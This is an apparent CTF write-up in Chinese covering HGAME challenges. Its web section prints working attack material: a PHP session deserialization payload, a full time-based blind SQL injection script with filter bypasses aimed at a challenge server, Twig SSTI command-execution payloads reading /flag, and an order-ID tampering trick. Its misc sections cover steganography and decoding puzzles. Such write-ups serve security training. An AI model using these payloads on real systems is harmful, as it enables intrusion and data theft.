![在这里插入图片描述](https://img-blog.csdnimg.cn/e9536c8819ad434092206466329965f3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
下载源码,登录这里绕过is_numeric()
即可,bypass网上方法很多
![在这里插入图片描述](https://img-blog.csdnimg.cn/2e990950f6194e8eb5f46d8ef37691d4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
username=adm1n&password=1080%00
![在这里插入图片描述](https://img-blog.csdnimg.cn/0fef5c51ba60465d8f5d7df68f92d5e8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
继续分析源码
![在这里插入图片描述](https://img-blog.csdnimg.cn/0f86a76eea6d417cb981ca21abd48de8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
{
"name":"mochu7"
}
![在这里插入图片描述](https://img-blog.csdnimg.cn/561795b8a2044e028fc2839037526035.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
可以看到对键值的内容进行了序列化存储,键名内容不变,中间用|
分隔
继续分析源码
![在这里插入图片描述](https://img-blog.csdnimg.cn/aa879c5ff59f408b992af931ce3e8f7c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
重点在这里的decode
函数,对|
后部分的数据进行反序列化,但是如果键名部分也有|
符号,就会对键名|
之后的部分反序列化
![在这里插入图片描述](https://img-blog.csdnimg.cn/018ab11b1315421886af0778e55a8a54.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
<?php
class Evil {
public $file='/flag';
}
$obj = new Evil();
var_dump(serialize($obj));
//O:4:"Evil":1:{s:4:"file";s:5:"/flag";}
?>
name|O:4:"Evil":1:{s:4:"file";s:5:"/flag";}
![在这里插入图片描述](https://img-blog.csdnimg.cn/e9c5e455cf804143833d10d40d57c01d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Pokemon
![在这里插入图片描述](https://img-blog.csdnimg.cn/202a2e546fc04cb08563582d3c536827.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_16,color_FFFFFF,t_70,g_se,x_16)
error.php
对传入的code
参数进行了过滤![在这里插入图片描述](https://img-blog.csdnimg.cn/9bffdfec2fff453689467765a3862ed1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
fuzz一下sql关键字,长度为473的包都是被过滤的
![在这里插入图片描述](https://img-blog.csdnimg.cn/f2d10141d86747d48467d17752be3b07.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
不过这里的过滤是直接替换为空,可双写绕过
![在这里插入图片描述](https://img-blog.csdnimg.cn/14901c79b6f94cbcae70412981b2b45d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/084aec4965324c99869cd9ce4114f356.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9ecee77dbf544f11acdab8c247c253fc.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
可进行时间盲注,过滤的地方用双写绕过即可
import requests
printable_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"
burp0_url = "http://121.43.141.153:60056/error.php?code="
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
result = ""
for i in range(50):
for s in printable_str:
# payload = "if(ascii(mid(database(),{},1))like({}),sleep(1),1)".format(i, ord(s))
# payload = "if(ascii(mid((selselectect/*/**/*/group_concat(table_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.tables/*/**/*/whewherere/*/**/*/(table_schema)like('pokemon')),{},1))like({}),sleep(1),0)".format(i, ord(s))
# payload = "if(ascii(mid((selselectect/*/**/*/group_concat(column_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.columns/*/**/*/whewherere/*/**/*/(table_name)like('fllllllllaaaaaag')),{},1))like({}),sleep(1),0)".format(i, ord(s))
payload = "if(ascii(mid((selselectect/*/**/*/flag/*/**/*/frfromom/*/**/*/pokemon.fllllllllaaaaaag),{},1))like({}),sleep(1),1)".format(i, ord(s))
resp = requests.get(url=burp0_url+payload, headers=burp0_headers)
if resp.elapsed.seconds > 3:
result += s
print("[+]{}".format(result))
else:
continue
![在这里插入图片描述](https://img-blog.csdnimg.cn/9f81e0a668f4446e9b2ce81cafa28a84.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
MISC
一张怪怪的名片
![在这里插入图片描述](https://img-blog.csdnimg.cn/67a3ec6446594469a13cf1890c7c4369.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/7c9e5543977a488db966eb5c5afaab1d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
PS
打开,用钢笔选中每块选区,然后拼起来,加大曝光,得到如下
![在这里插入图片描述](https://img-blog.csdnimg.cn/613b063a709d429ea1d8faec0ee2395e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
直接扫不出来,二维码中间貌似被涂黑过,有点干扰。尝试用二维码修复站模糊识别:https://merricx.github.io/qrazybox/
![在这里插入图片描述](https://img-blog.csdnimg.cn/e478daf0b6564f0d83dfb877a1cbafdd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/a807931b34cc4863b11f3fb398f7dbf8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/efcee0e847954cbfba08fdf77de9e187.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/80f09ecd1b2d4f188e138de2e699550a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/cfae302917d94cb3bf02eccae0716552.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
看样子像是一个链接,用搜索引擎语法找
![在这里插入图片描述](https://img-blog.csdnimg.cn/9aea952c0cc644dcad17011bcad97841.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
找到出题人的github,在github首页找到出题人的博客地址
![在这里插入图片描述](https://img-blog.csdnimg.cn/be82e87b2c6741de868b671fb5af70a0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
然后在出题人博客的友联里面找到了鸿贵安
![在这里插入图片描述](https://img-blog.csdnimg.cn/a442e4bb16f74af681c47221a0ad7d5c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
https://homeginan.homeboyc.cn
![在这里插入图片描述](https://img-blog.csdnimg.cn/0aa897afa13a4847a3f186a1f8046992.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/8df46b9b372e410388738b865001abe8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
b09nyMj9cOZ3aB8KUcnh46nIi9fGTIL6XjnnW1/sj/nUR1BFYkf0JwB0qjcQhcCy7dxtsHqznOMkt6XEGKD8y5K5whenAcwuiT/Rue+snORVWAorXsB3ZGcITuFLEIThbx4/vh5E/Wk4R8qhNcFh5bwSSmwdULVuwBrJ5H3+kBOsYafEqP8RDX3sOdXTj80V8Puq+TNbXAMhxvdLGkkcBQ==
![在这里插入图片描述](https://img-blog.csdnimg.cn/c5ec705893f047418cbe3b6c1e18a417.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_15,color_FFFFFF,t_70,g_se,x_16)
b09nyMj9cOZ3aB8KUcnh46nIi9fGTIL6XjnnW1/sj/nUR1BFYkf0JwB0qjcQhcCylCR8cGp6MhxD4pTEACGutFVYCitewHdkZwhO4UsQhOFvHj++HkT9aThHyqE1wWHlvBJKbB1QtW7AGsnkff6QE+wqMT6fADfdpBQNOzg4DYA=
Derive PBKDF2 key
的passphrase
要猜,根据博客上给出的信息
![在这里插入图片描述](https://img-blog.csdnimg.cn/dfdd7f13aadd4a8baf57e59095d0fb2e.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/c53f7039dd2c4e478004cece1213472b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
那么生日应该是:20020816
试了一下发现还不对,最后经过多次尝试得到密码为:hgame20020816
![在这里插入图片描述](https://img-blog.csdnimg.cn/4b9a1bbca94b4037a9eb47a7f58acda8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/dee8703e8e2143bdb510ac34a171e398.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{Wh0_4m_1?I_like_S0ciaI_En9in33ring}
你上当了 我的很大
![在这里插入图片描述](https://img-blog.csdnimg.cn/d304a5d94b7b457aa89e73cdd96fbe7e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
第一步套娃解压,Python脚本简单处理下即可
import zipfile
import os
def decompress(files_list:list) -> list:
dec_files_list = []
for file_name in files_list:
if '.zip' in file_name:
zf = zipfile.ZipFile(file_name)
zf.extractall(os.getcwd())
dec_files_list += zf.namelist()
else:
continue
return dec_files_list
if __name__ == '__main__':
files_list = os.listdir()
while True:
dec_files_list = decompress(files_list)
if len(dec_files_list) == 0:
break
else:
files_list = dec_files_list
![在这里插入图片描述](https://img-blog.csdnimg.cn/6e775675add84cd5991609bc1ac30795.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
得到三个经典视频,在agfl.mp4
和lagf.mp4
的视频末尾有条码
![在这里插入图片描述](https://img-blog.csdnimg.cn/18cd60b45fe248b391b2b9f5823abcd9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/96fe25663b8d4d3abc4abe207e37ae49.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
结合提示给的两个条码
![在这里插入图片描述](https://img-blog.csdnimg.cn/bbab27a00df64b0bbcc19880c7f973c5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/46c48ed1a766484eb8b546b8c97f9b3a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
给了图床链接的两个条码用下面这个识别:
- https://zxing.org/w/decode.jspx
另外两个用另一个条码识别工具站:
- https://products.aspose.app/barcode/recognize
一共得到四张base64编码过的图片字节流
- https://the-x.cn/zh-cn/base64/(base64解码,可识别解码后的文件类型)
将得到的四张图片用PS
简单拼接一下即可
![在这里插入图片描述](https://img-blog.csdnimg.cn/5409e4a745fa42339958387ca10905f9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{Do_y0U_lIk3_MazE5?}
Level - Week3
MISC
卡中毒
![在这里插入图片描述](https://img-blog.csdnimg.cn/75ebd2a89f454e9bb2c9fdc424c6fa0b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
查看浏览器历史记录找到个7z压缩包
![在这里插入图片描述](https://img-blog.csdnimg.cn/945f64a7f37b46b7a3588d7268e6b0e4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
导出、解压发现是WannaRen勒索病毒
加密的文件
![在这里插入图片描述](https://img-blog.csdnimg.cn/b7537f3d01c047e58a63cae3037bf97b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
一键解密 火绒推出WannaRen勒索病毒解密工具:https://www.huorong.cn/info/1586440740454.html
![在这里插入图片描述](https://img-blog.csdnimg.cn/6e73484674224a26b55a168b0f5dff35.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
得到新佛曰论禅编码
新佛曰:諸隸僧降閦吽諸陀摩閦隸僧缽薩閦願耨願嘚願諦閦諸囉閦嘇劫嘇閦亦伏迦薩摩愍心薩摩降眾閦聞諸阿我閦嚩諸寂嘚咒咒莊閦我薩闍嚩劫閦嘇薩迦聞色須嘇聞我吽伏閦是般如閦
新佛曰论禅解码:http://hi.pcmoe.net/buddha.html
hgame{F1srt_STep_0f_MeM0rY_F0renS1cs}
谁不喜欢猫猫呢
![在这里插入图片描述](https://img-blog.csdnimg.cn/4d910b63a0fa44d084929ad8047cecc5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
每隔10个像素点就有一个像素位置比较突出
![在这里插入图片描述](https://img-blog.csdnimg.cn/6ccf7d4377d547068d497b49027b9c73.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
有点像缩略图,通过stegsolve也可发现确实是有一些信息,很有规律的排布,用Python简单提取下即可
from PIL import Image
img = Image.open('1.png')
width, height = img.size
pixs_list = []
for w in range(5, width, 11):
for h in range(5, height, 11):
pix = img.getpixel((w, h))
pixs_list.append(pix)
#分解下pixs_list的长度,就可以得到生成图片的宽高
new_width, new_height = 215, 215
new_img = Image.new('RGB', (new_width, new_height))
idx = 0
for n_w in range(new_width):
for n_h in range(new_height):
new_img.putpixel((n_w, n_h), pixs_list[idx])
idx += 1
new_img.save('ok.png')
new_img.show()
![在这里插入图片描述](https://img-blog.csdnimg.cn/11f1b3ed9c1b4fcda7259d116d39282b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
得到信息
st = 1
a = 9
b = 39
暂时不知道什么意思,图片上有一些带颜色小点很突出,拖进PS分析发现间隔也是很规律,每个点间隔4个像素点
from PIL import Image
img = Image.open('ok.png')
width, height = img.size
pixs_list = []
for w in range(2, width, 5):
for h in range(2, height, 5):
pix = img.getpixel((w, h))
pixs_list.append(pix)
#分解pixs_list的长度,
new_width, new_height = 43, 43
new_img = Image.new('RGB', (new_width, new_height))
idx = 0
for n_w in range(new_width):
for n_h in range(new_height):
new_img.putpixel((n_w, n_h), pixs_list[idx])
idx += 1
new_img.save('ok1.png')
new_img.show()
![在这里插入图片描述](https://img-blog.csdnimg.cn/a9152a4e55af4dc0870da3c23c80df95.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
看到这里了看过Arnold变换(猫映射)
置乱效果图的师傅应该会觉得比较像,前面的到a=9、b=39
是Arnold变换
矩阵参数,st=1
是周期
from PIL import Image
img = Image.open('ok1.png')
if img.mode == "P":
img = img.convert("RGB")
assert img.size[0] == img.size[1]
dim = width, height = img.size
st = 1
a = 9
b = 39
for _ in range(st):
with Image.new(img.mode, dim) as canvas:
for nx in range(img.size[0]):
for ny in range(img.size[0]):
y = (ny - nx * a) % width
x = (nx - y * b) % height
canvas.putpixel((y, x), img.getpixel((ny, nx)))
canvas.show()
canvas.save('ok2.png')
![在这里插入图片描述](https://img-blog.csdnimg.cn/bc71d4cef9b44b12bd22096d915ca940.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
很像nipet
,尝试npiet
执行一下
![在这里插入图片描述](https://img-blog.csdnimg.cn/fdecc9f85ca04b81a0572a27ab4c424d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
原图是附加了一个zip的字节流的,分离出来得到两个list,根据提示把每一项的加起来
from binascii import *
list1 = [776686, 749573, 6395443, 2522866, 279584, 587965, 4012670, 1645156, 2184634]
list2 = [6065523, 6419830, 1421837, 5103682, 5963053, 2842996, 1113825, 1594064, 4578755]
flag = ''
for i in range(len(list1)):
flag += unhexlify(hex(list1[i]+list2[i])[2:]).decode()
print(flag)
hgame{wH@t_4_AM4Z1N9_1m4g3}
PS:这样的最后处理得到flag,感觉会有挺多的非预期
WEB
SecurityCenter
![在这里插入图片描述](https://img-blog.csdnimg.cn/b3accadde3a947379d440014f3c170df.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_17,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/0e10a4c3cae64c309663501c73fb1ed5.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9229b2c4641e492b952b592e019ac26c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
一开始以为是SSRF,打了半天在hint提供的信息最下面发现了这个
![在这里插入图片描述](https://img-blog.csdnimg.cn/ff71c85f99a84ed9b41360a721558ed1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
测试一下
![在这里插入图片描述](https://img-blog.csdnimg.cn/61cc1c4fc9a54654984303856c285308.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Twing v3.3.7
的模板,找下漏洞
- https://whoamianony.top/2021/08/22/Web安全/Twig 模板注入从零到一/
SSTI payload
{{["id"]|map("system")}}
{{["id"]|map("passthru")}}
{{["id"]|map("exec")}} // 无回显
![在这里插入图片描述](https://img-blog.csdnimg.cn/4f1f9c1bb6114165bec344257d14af70.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![](https://img-blog.csdnimg.cn/e948d969c86e45fdbfd9ea8119f2f892.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
尝试读取的时候发现过滤了cat
,简单绕过一下即可
![在这里插入图片描述](https://img-blog.csdnimg.cn/d5db8d6006464eaeab7026b80e9aea1e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
返回内容不能有hgame
?
base64编码一下返回
/redirect.php?url={{["head /flag | base64"]|map("system")}}
![在这里插入图片描述](https://img-blog.csdnimg.cn/d86b6dd8bd714016ba1b1dd5e209fdea.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
然后这里记录一下我一开始使用的读取方法
![在这里插入图片描述](https://img-blog.csdnimg.cn/8b361637fbba4d35b631e66776ec30b9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
redirect.php?url={{["/usr/local/bin/php /flag | base64"]|map("system")}}
![在这里插入图片描述](https://img-blog.csdnimg.cn/9fa38696798643a29789893e9d417ce1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
PS C:UsersAdministrator> php -r "var_dump(base64_decode('aGdhbWV7IVR3MTktUzV0MX4xc15zMDBPME9faW50ZXIzc3QxbjV+IX0K'));"
Command line code:1:
string(42) "hgame{!Tw19-S5t1~1s^s00O0O_inter3st1n5~!}"
Vidar shop demo
![在这里插入图片描述](https://img-blog.csdnimg.cn/1843a61a9e774a299f3ad80148aa2ed3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_17,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/6b01d2a350f04a24a73205978a1d6e91.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
这三个js文件都有map文件,可以用reverse-sourcemap
还原源码
参考:https://www.freebuf.com/articles/web/276810.html
得到源码可自行分析
![在这里插入图片描述](https://img-blog.csdnimg.cn/ffb1d8a4055a463bb4e31dfde179c5f0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
不过这里的漏洞,黑盒就测试出来了
注册的时候注意下有一些限制,最好用burp改包注册,注意用户名长度和密码长度即可成功注册
![在这里插入图片描述](https://img-blog.csdnimg.cn/1ed4a5ac1f3c422bafebf41d9cec6da4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
注册成功后登录能看到用户的一些信息
![在这里插入图片描述](https://img-blog.csdnimg.cn/7e08a0b597644f789b7202363ce5cd4a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
首先任意下单一个买得起的,支付,看看这个过程
![在这里插入图片描述](https://img-blog.csdnimg.cn/7d8f9f6ffac94a0991abad3c4971e7d0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
支付后,账户拥有的余额减少了20
![在这里插入图片描述](https://img-blog.csdnimg.cn/12d8616ff5934369b52275f47deaf7be.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9ac3f9e951b64c2b99e2f3bea3124379.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
然后发现这个已支付的订单可以删除
![在这里插入图片描述](https://img-blog.csdnimg.cn/544435a02cc44fc89a0a594b6a3419d8.png)
删除完之后发现,之前减去的余额返回到了账户
![在这里插入图片描述](https://img-blog.csdnimg.cn/b47e3305330d4b82b7e83d695a8fb1d6.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
有增加对应取消订单的价格,抓包分析下传参
![在这里插入图片描述](https://img-blog.csdnimg.cn/e514a75ef4c24e3bb8b87edf68b2b30d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/edca271ebb5a4dafbe41926f0b2d958a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
只传了一个订单的id,尝试修改为下单好的更大金额的订单的id,比如flag的订单id
![在这里插入图片描述](https://img-blog.csdnimg.cn/778115e4ef08467d98cc9d365ea8540c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
增加了flag订单的金额到账户余额上,余额够了,直接买flag,支付后回到订单页面得到flag
![在这里插入图片描述](https://img-blog.csdnimg.cn/149910fd7e9848fb99713429c918c1df.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
LoginMe
![在这里插入图片描述](https://img-blog.csdnimg.cn/3cd417d2acad45a38e4c6a23af48560c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_18,color_FFFFFF,t_70,g_se,x_16)
本次HGAME唯一一道拿到血的题目呜呜呜,虽然是三血,纪念一下
![在这里插入图片描述](https://img-blog.csdnimg.cn/bc3338d5da8c4ba0a5a5ecee37b472cc.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/8082b7cdd0df46e6a58273f90db4bdfb.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
源码里面给了个hint的图片
